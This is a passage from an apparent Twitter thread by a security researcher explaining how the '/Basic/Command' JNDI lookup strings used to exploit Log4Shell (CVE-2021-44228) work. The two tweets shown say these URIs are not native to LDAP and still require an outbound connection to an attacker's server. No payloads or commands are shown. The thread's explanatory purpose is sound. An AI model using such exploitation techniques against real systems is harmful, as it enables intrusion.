geech 👽👾 Profile picture
cybercrime connoisseur and synapse fanboy | hax @OSUSEC | tweets my own | @captainGeech@infosec.exchange
Dec 13, 2021 8 tweets 6 min read
In a conversation I had with some folks yesterday about different exploit techniques for CVE-2021-44228, there was some confusion around how the /Basic/Command JNDI strings work. Let me break down what's happening here in a🧵(1/8)

#Log4Shell #log4j First, these URIs are not a native part of the LDAP protocol. They aren't being handled by the JNDI lookup internally, and still require an outbound TCP connection to the attacker's malicious TCP server.

#Log4Shell #log4j

(2/8)